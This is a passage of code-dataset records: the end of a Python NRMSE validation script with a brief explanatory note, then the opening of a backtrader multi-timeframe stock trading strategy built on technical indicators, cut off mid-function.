{(~double_train_edge_mask).sum()}')\nprint(f'known count : {(double_train_edge_mask).sum()}')\n\nprint(nrmse)\n\n","sub_path":"pnu_semiconductor/code_validation/nrmse_valid.py","file_name":"nrmse_valid.py","file_ext":"py","file_size_in_byte":6537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
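For reference, the quantity the script appends per column is sqrt(sum((y_true - y_pred)^2)) / std(y_true), with mean imputation standing in for the model output. A self-contained sketch follows; the tensor values are made up, only the formula mirrors the script:

# Illustrative per-column NRMSE, matching the script's up/std computation.
import torch

y_true = torch.tensor([1.0, 2.0, 3.0, 4.0])   # observed edge attributes of one column
y_pred = y_true.mean().expand(len(y_true))    # mean imputation, as in the script
std = torch.std(y_true).item()                # per-column std, not the global one
nrmse = torch.sqrt(((y_true - y_pred) ** 2).sum()).item() / std
print(nrmse)

Note this is a sum of squared errors under the root, not a mean, so the value grows with the number of hidden edges per column; that is faithful to the script above.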
+{"seq_id":"53441349","text":"\"\"\"\nTrading model that can use multiple symbols, multiple timeframes, multiple indicators, and different start/end dates and analytics.\n1 primary data feed (5 min timeframe) is sourced from mysql (but can be sourced elsewhere), and then 2 additional data feeds(resampled datafeeds)\ncreated for 3 additional higher timeframes. Data feeds are as follows: data0 = 5min, data1= 15min, data2 = 60min, data3 = 1day.\nEach symbol can be accessed in each timeframe. For example, MSFT and XOM would be appear as:\ndata0 MSFT (base timeframe), data0 XOM(base timeframe), data1 MSFT(next higher timeframe), data1 XOM, data2 MSFT, data2 XOM, data3 MSFT(highest timeframe), data3 XOM - a total of 8 'datas'.\nIndicators can also be treated as a datafeed input, i.e. slope of ema indicator.\nEach data produces a \"line\" of data that includes everything from the data feed, i.e. Open, high, low, close etc. System iterates over each line via next() function to produce its results.\n\nStrategies:\n1. Mean Reversion (from double top/bottom - price breaks through prior day high/low than short/buy when price falls back just below/above prior day high/low to average like sma, vwap, etc.) - more opportunities than trending\n2. Trending (buy first oversold cycle of trend when stochastic falls under 20) - account for distance and angle of pullback (small pullback at slight angle more bullish than deeper pullback at sharp angle). Shape of pullback important - is it intermittant staircase move with sellers pushing prices down (bad, think 2 or 3 big red candle moves on pullback mixed with small green bars), or is it multiple long candle tails with small green bodies which is more bullish) Also, less volume on pullback better.\n3. VWAP trading - use as support/resistance/target for above 2 strategies\n\n\"\"\"\n\n\n\n#IMPORT MODULES\nimport backtrader as bt\nimport backtrader.indicators as btind\nfrom backtrader.feeds import mysql\nfrom datetime import date, time, datetime, timedelta\nimport pytz\nimport timeit\nimport copy\nimport math\nfrom collections import defaultdict\n\n\n#***************************************************DEVELOP STRATEGY********************************************************************\n#DEFINE ALL STRATEGY USER INPUTS\nclass UserInputs():\n\t\n\tdef __init__():\n\t\tpass\n\t\n\tdef datalist(data_req):\n\t\t#Create list of tickers to load data for. Market Breadth indicators need to be removed from initiliazation and next() so they are not traded\n\t\t\n\t\t#TICK is # of NYSE stocks trading on an uptick vs # of stocks trading on downtick. About 2800 stocks total, usually oscillates between -500 to +500. Readings above 1000 or below -1000 considered extreme\n\t\t#TRIN is ratio of (# of Advance/Decliners)/(Advance/Decline Volume). Below 1 is strong rally, Above 1 is strong decline.\n\t\t#VIX is 30 day expectation of volatility for S&P 500 options. 
VIX spikes correlate to market declines because more people buying options to protect themselves from declines\n\t\t\n\t\t#datalist = ['VIX','TICK-NYSE','TRIN-NYSE','SPY','XLU','IAU']\n\t\tdatalist = ['SPY','XLU']\n\t\t#datalist = ['SPY','IAU','TIP','AGG','XHB','DBA','VNQ','LQD','EWZ','XLU','MCD','XLK',]\n\t\t#datalist = ['IAU','TIP','AGG','EMB','VNQ','XLU','SPY','XOM','LQD','EWZ','MCD','DBA','EWH','EWW','HYG','XLV','XRT','XLK','SHY','XHB']\n\t\tibdatalist = ['SPY-STK-SMART-USD','AAPL-STK-SMART-USD']\n\t\t#ibdatalist = ['EUR.USD-CASH-IDEALPRO',]\n\t\t\n\t\tif data_req == 'ib':\n\t\t\treturn ibdatalist\n\t\telif data_req == 'hist':\n\t\t\treturn datalist\n\t\n\tdef model_params():\n\t\tparams = dict(\n\t\t\tlive_status = False, #Flip between live trading (True) and backtesting (False)\n\t\t\tstart_date = date(2016, 4, 1), #Dates for backtesting\n\t\t\tend_date = date(2016,7, 30),\n\t\t\tbase_timeframe = 5, #MINUTES\n\t\t\ttimeframe1 = 15, #MINUTES\n\t\t\ttimeframe2 = 60, #MINUTES\n\t\t\ttimeframe1on = True,\n\t\t\ttimeframe2on = True,\n\t\t\tprintlines = False,\n\t\t\tsessionstart = time(8,30),\n\t\t\tsessionend = time(15,00),\n\t\t\tTrailingStop = False,\n\t\t\tstart_cash=100000,\n\t\t\tdollars_risked_per_trade = 1000,\n\t\t\ttotal_dollars_risked = 50000,\n\t\t\ttarget=3, #multiple of dollars risks per trade, to determine profit target per trade. \"2\" represents target that is double dollars risked\n\t\t\tmin_touches=2,#Support/Resistance\n\t\t\ttolerance_perc=1.5,#Support/Resistance\n\t\t\tbounce_perc=5,#Support/Resistance\n\t\t\ttimer='off', #time program, 'on' or 'off', returns number of seconds\n\t\t\twriter='off', #export results to CSV output report 'on' or 'off'\n\t\t\tatr_tframe = '1', #For entry/exit stoploss logic - Apply atr timeframe 0, 1, or 2. Passed as string.\n\t\t\t)\n\t\treturn params\n\t\t\t\n\t#make sure these are NUMBERS ONLY, NOT STRINGS\n\tdef ind_params():\n\t\tparams = dict(\n\t\t\tsma1 = 10,\n\t\t\tsma2 = 20,\n\t\t\tema1= 10,\n\t\t\tema2= 20,\n\t\t\tema3=20,\n\t\t\tatrperiod= 14,\n\t\t\tatrdist= 2, \n\t\t\tavg_atr_per=20,\n\t\t\tslope_period=14,\n\t\t\tbreakout_per=5, \n\t\t\tavg_per=10,\n\t\t\tstoch_per=14,\n\t\t\tstoch_fast=3,\n\t\t\tbollinger_period=20,\n\t\t\tbollinger_dist=2,\n\t\t\tlookback=14,#Support/Resistance calcs\n\t\t\t)\n\t\treturn params\n\t\n\tdef max_ind():\t\n\t\tindicator_dict = UserInputs.ind_params()\n\t\tmaxind = max(indicator_dict.values()) \n\t\treturn maxind\n\t\t\n\tdef ib_backfill_start(maxind):\n\t\t#sometimes IB backfill does not collect enough data for live trading - this creates new start date for backfill to guarantee enough data collected for longest indicator lookback period\n\t\ttoday_date = datetime.now()\n\t\tbackfill_days = -(maxind)\n\t\tib_start_date = today_date + timedelta(days=backfill_days)\n\t\treturn ib_start_date\n\t\nclass Strategy(bt.Strategy,UserInputs):\n\t#Due to backtrader convention, any strategy arguments should be defined inside `params` dictionary or passed via bt.Cerebro() class via .addstrategy() method.\n\tparams = copy.deepcopy(UserInputs.ind_params()) #Access parameters from other class so params can be referenced outside Strategy class. 'Deep copy' copies all dictionary keys and values, vs. 
regular(shallow) copy which just creates reference back to old dictionary\n\t\n\tdef __init__(self):\n\t\t\n\t\t#Set program start time\n\t\tstart_time=datetime.now().time()\n\t\tprint('Program start at {}'.format(start_time))\n\t\n\t\t#print(self.params.sma1, self.p.ema1, self.params.atrperiod) #Proof deep copy worked for params\n\t\t\n\t\t#initialize counters for prenext/next\n\t\tself.dayperiod = 0\n\t\tself.nextcounter = 0\t\n\t\tself.counter = 0\n\t\tself.counttostop = 0\n\t\tself.datastatus = 0\n\t\tself.prenext_done = False\n\t\tself.bought = 0\n\t\tself.sold = 0\n\t\tself.target_long_price = 0\n\t\tself.target_short_price = 0\n\t\tself.trade_open_counter = 0\n\t\tself.trade_close_counter = 0\t\n\t\tself.trade_total_counter = 0\n\t\tself.lost_counter = 0 \n\t\tself.won_counter = 0\n\t\t\n\t\t#Define dictionaries and lists to be accessed from all timeframes\n\t\tself.atr_list =[]\n\t\tself.inds = dict()\n\t\tself.gap_dict=dict()\n\t\tself.rnghigh_dict = dict()\n\t\tself.rnglow_dict= dict()\n\t\tself.longstop_dict = dict()\n\t\tself.shortstop_dict = dict()\n\t\tself.target_long_dict = dict()\n\t\tself.target_short_dict = dict()\n\t\tself.size_dict = dict()\n\t\tself.inorder_dict = dict()\t\t\n\t\tself.sup_dict = dict()\n\t\tself.res_dict = dict()\n\t\tself.pos_dict = defaultdict(list)\n\t\tself.typprice_dict = defaultdict(list)\n\t\tself.volume_dict = defaultdict(list)\n\t\t\t\t\n\t\t#Create/Instantiate objects to access user input parameters\n\t\tmodelp = UserInputs.model_params()\n\t\tindp = UserInputs.ind_params()\n\t\tdatalist = UserInputs.datalist('hist')\n\t\tibdatalist = UserInputs.datalist('ib')\n\t\t\n\t\t#Determine interval for timeframe looping\n\t\tif not modelp.get('live_status'):\n\t\t\tdata_feed_count = len(self.datas)\n\t\t\tticker_count = len(datalist)\n\t\t\tself.ticker_interval = int(data_feed_count/ticker_count) #Needs to be an integer\n\t\telif modelp.get('live_status'): \n\t\t\tdata_feed_count = len(self.datas)\n\t\t\tticker_count = len(ibdatalist)\n\t\t\tself.ticker_interval = int(data_feed_count/ticker_count) #Needs to be an integer\n\t\t\n\t\t#Determine # of base timeframe periods within trading day\n\t\tself.intraday_periods = int(390/modelp.get('base_timeframe'))\n\t\t\n\t\t#************************INITITIALIZE INDICATORS*********************************************************\n\t\t#Initialize dictionary's\n\t\tfor x in range(0, len(self.datas), self.ticker_interval):\n\t\t\t\n\t\t\td = self.datas[x]\n\t\t\tprint(d._name)\n\t\t\t\n\t\t\t#Order dictionaries\n\t\t\tself.target_long_dict[d._name] = dict()\n\t\t\tself.target_short_dict[d._name] = dict()\n\t\t\tself.inorder_dict[d._name] = dict()\n\t\t\tself.target_long_dict[d._name] = 0\n\t\t\tself.target_short_dict[d._name] = 0\n\t\t\tself.inorder_dict[d._name] = False\n\t\n\t\tfor i, d in enumerate(self.datas):\n\n\t\t\t#Sizing dictionary\n\t\t\tself.size_dict[d._name] = dict()\n\t\t\tself.size_dict[d._name] = 0\n\t\t\t\t\n\t\t\t#For support/resistance dictionaries\n\t\t\tself.sup_dict[d._name] = dict()\n\t\t\tself.res_dict[d._name] = dict()\n\t\t\tself.sup_dict[d._name] = 0\n\t\t\tself.res_dict[d._name] = 10000\n\t\t\t\n\t\t\t#For all indicators\n\t\t\tself.inds[d._name] = dict()\n\t\t\t\n\t\t\t\t\t\n\t\t\t#Moving Average Indicators - FAST, SLOW, and CROSS\n\t\t\tself.inds[d._name]['sma1'] = btind.SMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('sma1'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['sma2'] = 
btind.SMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('sma2'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\n\t\t\tself.inds[d._name]['ema1'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema1'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['ema2'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema2'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['ema3'] = btind.EMA(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('ema3'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\n\t\t\t#This will double pre-next \t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['cross'] = btind.CrossOver(self.inds[d._name]['ema2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.inds[d._name]['ema3'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\n\t\t\t#RSI\n\t\t\tself.inds[d._name]['rsi']= btind.RSI(d,\n\t\t\t\t\t\t\t\t\t\t\t\tsafediv=True,\n\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\n\t\t\t\t\t\t\n\t\t\t#AVERAGE TRUE RANGE INDICATOR\n\t\t\tself.inds[d._name]['atr'] = btind.ATR(d,\n\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('atrperiod'),\n\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\n\t\t\t#Bollinger Band\n\t\t\tself.inds[d._name]['bollinger'] = btind.BollingerBands(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('bollinger_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tdevfactor = indp.get('bollinger_dist'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\n\t\t\t#Stochastics\n\t\t\tself.inds[d._name]['stochastic'] = btind.StochasticFast(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('stoch_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod_dfast= indp.get('stoch_fast'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsafediv=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\n\t\t\t\n\t\t\t#ADX\n\t\t\tself.inds[d._name]['adx'] = btind.ADX(d,plot=True)\n\t\t\t\t\t\n\t\t\t\"\"\"\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t#Pivots\n\t\t\tself.inds[d._name]['pivots'] = btind.pivotpoint.PivotPoint(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\"\"\"\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\n\t\t\t#Highest and Lowest Values of Period Indicator\n\t\t\tself.inds[d._name]['highest'] = btind.Highest(d.high,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('breakout_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['lowest'] = btind.Lowest(d.low,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('breakout_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\n\t\t\t#Slope indicators\n\t\t\tself.inds[d._name]['slope']= btind.Slope(d.close,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_sma1'] = \tbtind.Slope(self.inds[d._name]['sma1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_SMA1')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_sma1'] = \tbtind.Slope(self.inds[d._name]['slope_sma1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_SMA1')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_sma_width'] = btind.Slope(self.inds[d._name]['sma1']-self.inds[d._name]['sma2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 
'Slope_SMA_WIDTH')\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_adx'] = \tbtind.Slope(self.inds[d._name]['adx'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_ADX')\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_adx'] = \tbtind.Slope(self.inds[d._name]['slope_adx'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_ADX')\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_rsi'] = \tbtind.Slope(self.inds[d._name]['rsi'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_RSI')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_rsi'] = \tbtind.Slope(self.inds[d._name]['slope_rsi'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_RSI')\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_ema1'] = \tbtind.Slope(self.inds[d._name]['ema1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA1')\n\t\t\tself.inds[d._name]['slope_ema2'] = \tbtind.Slope(self.inds[d._name]['ema2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA2')\n\t\t\tself.inds[d._name]['slope_ema3'] = \tbtind.Slope(self.inds[d._name]['ema3'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA3')\n\t\t\t\n\t\t\tself.inds[d._name]['avg_volume'] = btind.Average(d.volume,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('avg_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t#Plot ADX and Slope on same subplot as stochastic\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['adx'].plotinfo.plotmaster = self.inds[d._name]['rsi']\n\t\t\t\n\t\t\t\n\t\t\t\t\t\t\t\n\tdef prenext(self):\n\t\t#print(self.datas[0].datetime.datetime().strftime('%H:%M:%S'))\n\t\t#pre-loads all indicator data for all timeframes before strategy starts executing\n\t\tself.counter += 1\n\t\t#If you want to see full set of data\n\t\t\"\"\"\n\t\tfor i, d in enumerate(self.datas):\n\t\t\tif d._name == d._name[:-1]+'0':\n\t\t\t\tprint('date {} prenext len {} - counter {}'.format(d.datetime.datetime().strftime('%Y-%m-%d %H:%M:%S'),len(self), self.counter))\n\t\t\"\"\"\n\t\tself.next()\n\t\t\t\t\n\tdef nextstart(self):\n\t\t#There is a nextstart method which is called exactly once, to mark the switch from prenext to next. 
\n\t\tself.prenext_done = True\n\t\tprint('--------------------------------------------------')\n\t\tprint('nextstart called with len {}'.format(len(self)))\n\t\tprint('--------------------------------------------------')\n\t\t\n\t\tsuper(Strategy, self).nextstart()\n\t\t\n\tdef next(self):\n\n\t\t#Start Timer\n\t\tif UserInputs.model_params().get('timer')=='on':\n\t\t\tself.t0 = datetime.utcnow() \n\t\t\n\t\t#print('Strategy: {}'.format(len(self)))\n\t\t\n\t\t#Create/Instantiate objects to access user input parameters\n\t\tmodelp = UserInputs.model_params()\n\t\tindp = UserInputs.ind_params()\n\t\tdatalist = UserInputs.datalist('hist')\n\t\tibdatalist = UserInputs.datalist('ib')\n\t\t\n\t\t#Convert backtrader float date to datetime so i can see time on printout and manipulate time variables\n\t\tdt = self.datetime.date()\n\t\tself.datadate=datetime.strftime(self.data.num2date(),'%H:%M:%S')\n\t\tself.hourmin = datetime.strftime(self.data.num2date(),'%H:%M')\n\t\t\n\t\tself.nextcounter = self.nextcounter + 1\n\t\t\n\t\t#Counter for VWAP Calculation (# of cumulative periods within 1 day)\n\t\tfor x in range(0, len(self.datas), len(self.datas)):\n\t\t\tif self.hourmin == '08:30':\n\t\t\t\t\tself.dayperiod = 0\t\n\t\t\tself.dayperiod = self.dayperiod + 1\n\t\t\t\n\t\t#Get available cash\n\t\tcash_avail = self.broker.getcash()\n\t\t\n#-------------------------------------------------------------------------------------------------------------------------\t\n\t\t#SETUP TRADING ENTRY/EXIT TIMEFRAME \n\t\tif self.maxtimeframe() > self.max_ind_period():\n\t\t\tfor i, d in enumerate(self.datas): #Need to iterate over all datas so atr and sizing can be adjusted for multiple time frame user parameters\n\t\t\t\t\n\t\t\t\t#Create naming convention so other timeframe data can be accessed via dictionary (i.e. 
support/resistance data)\t\n\t\t\t\t#If other timeframes needed, just change data name within calculation to one of the names below\n\t\t\t\tself.name_t0 = d._name[:-1]+'0'\n\t\t\t\tself.name_t1 = d._name[:-1]+'1'\n\t\t\t\tself.name_t2 = d._name[:-1]+'2'\n\t\t\t\t\t\t\n\t\t\t\t#Set support and resistance levels (10000 is the 'no resistance found' default)\n\t\t\t\tif self.resistance(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc')) != 10000:\n\t\t\t\t\tself.res_dict[d._name]= self.resistance(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc'))\n\t\t\t\tif self.support(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc')) !=0:\n\t\t\t\t\tself.sup_dict[d._name]=self.support(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc'))\n\t\t\t\t\t\t\n\t\t\t\tself.sup_t1 = self.sup_dict.get(self.name_t1) \n\t\t\t\tself.res_t1 = self.res_dict.get(self.name_t1) \n\t\t\t\tself.sup_t2 = self.sup_dict.get(self.name_t2) \n\t\t\t\tself.res_t2 = self.res_dict.get(self.name_t2) \n\t\t\t\t\n\t\t\t\t#Calculate VWAP\t- can't use indicator because it only works for a fixed period (intraday period expands throughout day)\n\t\t\t\tif d._name==self.name_t0: #only calculate VWAP for base timeframe\t\t\n\t\t\t\t\t\n\t\t\t\t\t#Determine cumulative volume and typical price, add typprice values to default dictionary, then sum values for the day\n\t\t\t\t\tself.cumvol = sum(d.volume.get(ago=0,size=self.dayperiod)) #sum all values for period defined in size\n\t\t\t\t\tself.typprice = round(((d.close[0]+d.high[0]+d.low[0])/3)*d.volume[0],2)\n\t\t\t\t\tself.typprice_dict[d._name].append(self.typprice)\n\t\t\t\t\tself.cumtypprice = sum(self.typprice_dict.get(self.name_t0)[-self.dayperiod:])\n\t\t\t\t\tif self.cumvol==0: #handle divide by zero error\n\t\t\t\t\t\treturn 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.vwap = round(self.cumtypprice/self.cumvol,2)\n\t\t\t\t#print(d._name,self.hourmin,d.close[0],d.high[0],d.low[0],d.volume[0],self.typprice,self.cumtypprice,self.cumvol,self.vwap)\n\n\t\t\t\t#Calculate Moving Averages\n\t\t\t\tself.sma1_t0 = round(self.inds.get(self.name_t0).get('sma1')[0],3)\n\t\t\t\tself.sma1_t1 = round(self.inds.get(self.name_t1).get('sma1')[0],3)\n\t\t\t\tself.sma2_t2 = round(self.inds.get(self.name_t2).get('sma2')[0],3)\n\t\t\t\t#self.vixsma_t0 = round(self.inds.get('VIX0').get('sma1')[0],3) #holds just VIX0 sma data\n\t\t\t\tself.spysma_t0 = round(self.inds.get('SPY0').get('sma1')[0],3) #holds just SPY0 sma data\n\t\t\t\t#self.ticksma_t0 = round(self.inds.get('TICK-NYSE0').get('sma1')[0],3) #holds just TICK0 sma data\n\t\t\t\t#self.trinsma_t0 = round(self.inds.get('TRIN-NYSE0').get('sma1')[0],3) #holds just TRIN0 sma data\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tself.ema1_t1 = round(self.inds.get(self.name_t1).get('ema1')[0],3)\n\n\t\t\t\t#Determine if space between SMA1 and SMA2 is widening or contracting \n\t\t\t\tself.slope_sma_width_t1 = round(self.inds.get(self.name_t1).get('slope_sma_width')[0],3)\n\t\t\t\t\t\n\t\t\t\t#Calculate slopes\n\t\t\t\tself.slope_t0 = round(self.inds.get(self.name_t0).get('slope')[0],3)\n\t\t\t\tself.slope_t1 = 
round(self.inds.get(self.name_t1).get('slope')[0],3)\n\t\t\t\tself.slope_t2 = round(self.inds.get(self.name_t2).get('slope')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_sma1_t1 = round(self.inds.get(self.name_t1).get('slope_sma1')[0],3)\n\t\t\t\tself.slope_of_slope_sma1_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_sma1')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_adx_t1 = round(self.inds.get(self.name_t1).get('slope_adx')[0],3)\n\t\t\t\tself.slope_of_slope_adx_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_adx')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_rsi_t1 = round(self.inds.get(self.name_t1).get('slope_rsi')[0],3)\n\t\t\t\tself.slope_of_slope_rsi_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_rsi')[0],3)\n\t\t\t\n\t\t\t\t#Calculate RSI\n\t\t\t\tself.rsi_t1 = round(self.inds.get(self.name_t1).get('rsi')[0],2)\n\t\t\t\t\n\t\t\t\t#Calculate Bollinger Bands\n\t\t\t\tself.boll_top_t1 = self.inds.get(self.name_t1).get('bollinger').lines.top[0]\n\t\t\t\tself.boll_bot_t1 = self.inds.get(self.name_t1).get('bollinger').lines.bot[0]\n\t\t\t\tself.boll_mid_t1 = self.inds.get(self.name_t1).get('bollinger').lines.mid[0]\n\t\t\t\t\n\t\t\t\t#Calculate Stochastic lines\n\t\t\t\tself.percK_t0 = round(self.inds.get(self.name_t0).get('stochastic').lines.percK[0],3)\n\t\t\t\tself.percK_t1 = round(self.inds.get(self.name_t1).get('stochastic').lines.percK[0],3)\n\t\t\t\tself.percD_t1 = round(self.inds.get(self.name_t1).get('stochastic').lines.percD[0],3)\n\t\t\t\t\n\t\t\t\t#Calculate ADX - Average Directional Movement Index to measure trend strength\n\t\t\t\tself.adx_t1 = round(self.inds.get(self.name_t1).get('adx')[0],3)\n\t\t\t\tself.adx_t2 = round(self.inds.get(self.name_t2).get('adx')[0],3)\n\t\t\t\t\n\t\t\t\t#Calculate highest and lowest indicators\n\t\t\t\tself.highest_t1 = round(self.inds.get(self.name_t1).get('highest')[0],3) \n\t\t\t\tself.lowest_t1 = round(self.inds.get(self.name_t1).get('lowest')[0],3) \n\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'0': #For a single timeframe only (timeframe 0)\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t0 = self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t0 = self.bearish_three_line_strike(d)\n\t\t\t\t\tself.bullish_engulfing_pattern_t0 = self.bullish_engulfing(d,self.slope_t0)\n\t\t\t\t\tself.bearish_engulfing_pattern_t0 = self.bearish_engulfing(d,self.slope_t0)\n\t\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'1': #For a single timeframe only (timeframe 1)\n\t\t\t\t\t#Determine if candlestick patterns exist\n\t\t\t\t\tself.bullish_engulfing_pattern_t1 = self.bullish_engulfing(d,self.slope_t1)\n\t\t\t\t\tself.bearish_engulfing_pattern_t1 = self.bearish_engulfing(d,self.slope_t1)\t\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t1 = self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t1 = self.bearish_three_line_strike(d)\n\t\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'2':\t#For a single timeframe only (timeframe 2)\n\t\t\t\t\tself.bullish_engulfing_pattern_t2 = self.bullish_engulfing(d,self.slope_t2)\n\t\t\t\t\tself.bearish_engulfing_pattern_t2 = self.bearish_engulfing(d,self.slope_t2)\t\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t2 = self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t2 = self.bearish_three_line_strike(d)\n\t\t\t\t\n\t\t\t\t#Calc Average ATR\n\t\t\t\tself.atr_t1 = round(self.inds.get(self.name_t1).get('atr')[0],3)\n\t\t\t\tavg_atr_t1 = self.average_atr(self.name_t1)\n\t\t\t\t\n\t\t\t\t#Calculate ATR (to be subtracted from 
